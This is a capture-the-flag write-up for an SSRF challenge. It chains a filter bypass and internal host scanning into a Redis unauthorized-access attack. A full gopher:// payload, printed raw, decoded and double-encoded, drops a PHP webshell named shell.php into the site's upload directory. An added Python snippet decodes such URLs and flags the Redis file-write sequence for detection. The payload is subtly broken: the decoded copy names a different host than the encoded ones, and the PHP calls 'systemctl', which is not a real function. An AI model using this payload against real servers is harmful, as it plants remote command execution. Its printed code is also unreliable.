Web-SSRFMe
Code analysis
1. Analyze the code: it tries to filter certain malicious inputs (such as file://, dict://, ../, 127.0.0.1 and localhost).
Testing SSRF
2. The script takes a url parameter; test fetching an external URL.
3. Passing the info parameter displays phpinfo().
Scanning for live internal hosts
4. Discover the internal host IP.
5. Test the neighbouring host IP 172.19.0.2; it responds.
6. Scan its ports.
7. Ports 80 and 6379 are found open.
8. Accessing port 6379 produces a Redis error; try a Redis unauthorized-access attack.
Scanning for a writable web directory
- Scan the site's directories and try writing to them.
- The upload directory is found.
Generating the payload
- Generate the payload with gopherus:
gopher://172.19.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2436%0D%0A%0A%0A%3C%3Fphp%20systemctl%28%27cat%20/flag%27%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
- URL-decode it to see what the payload does:
gopher://172.20.0.2:6379/_*1
$8
flushall
*3
$3
set
$1
1
$36
<?php systemctl('cat /flag'); ?>
*4
$6
config
$3
set
$3
dir
$20
/var/www/html/upload
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save
- Double URL-encode it:
gopher%3a%2f%2f172.19.0.2%3a6379%2f_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520%2fflag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2fvar%2fwww%2fhtml%2fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
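To check what a URL like the ones above actually carries (and to catch the same pattern in proxy or WAF logs), here is an added Python decoder that is not part of the original writeup: it strips the nested percent-encoding, parses the RESP arrays into Redis commands, and flags the CONFIG SET dir/dbfilename + SAVE sequence. The sample URL is constructed to mirror the page's payload with a harmless value in place of the PHP; the host 172.19.0.2:6379 and the upload path are taken from the page.

```python
from urllib.parse import quote, unquote

def decode_gopher_resp(url):
    """Strip nested %-encoding from a gopher:// URL and parse the RESP it carries.
    Returns (host, commands); commands is a list of argument lists."""
    decoded, prev = url, None
    while decoded != prev:                 # undo double (or deeper) encoding
        prev, decoded = decoded, unquote(decoded)
    if not decoded.startswith("gopher://"):
        raise ValueError("not a gopher URL")
    host, _, path = decoded[len("gopher://"):].partition("/")
    payload = path[1:] if path.startswith("_") else path   # gopher item type "_"
    commands, pos = [], 0
    while pos < len(payload):
        if payload[pos] != "*":            # stray bytes such as a trailing \n
            pos += 1
            continue
        end = payload.index("\r\n", pos)
        argc, pos = int(payload[pos + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if payload[pos] != "$":
                raise ValueError("malformed bulk string at offset %d" % pos)
            end = payload.index("\r\n", pos)
            size, pos = int(payload[pos + 1:end]), end + 2
            args.append(payload[pos:pos + size])
            pos += size + 2                # skip the bulk string's \r\n
        commands.append(args)
    return host, commands

def flags_rdb_file_write(commands):
    """True for the CONFIG SET dir/dbfilename + SAVE sequence used to drop a
    file through the RDB dump, as in this writeup; handy as a log/WAF check."""
    keys, saved = set(), False
    for args in commands:
        low = [a.lower() for a in args]
        if len(low) == 4 and low[:2] == ["config", "set"]:
            keys.add(low[2])
        if low and low[0] in ("save", "bgsave"):
            saved = True
    return "dbfilename" in keys and saved
# Constructed sample mirroring the writeup's payload (harmless value instead of
# the PHP): raw RESP, then single- and double-encoded like the original.
RAW_RESP = ("*1\r\n$8\r\nflushall\r\n*3\r\n$3\r\nset\r\n$1\r\n1\r\n$5\r\nhello\r\n"
            "*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$20\r\n/var/www/html/upload\r\n"
            "*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$9\r\nshell.php\r\n"
            "*1\r\n$4\r\nsave\r\n")
SAMPLE_URL = "gopher://172.19.0.2:6379/_" + quote(RAW_RESP, safe="")
SAMPLE_URL_DOUBLE = quote(SAMPLE_URL, safe="")
```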
Testing the payload
- Test the payload and get the flag.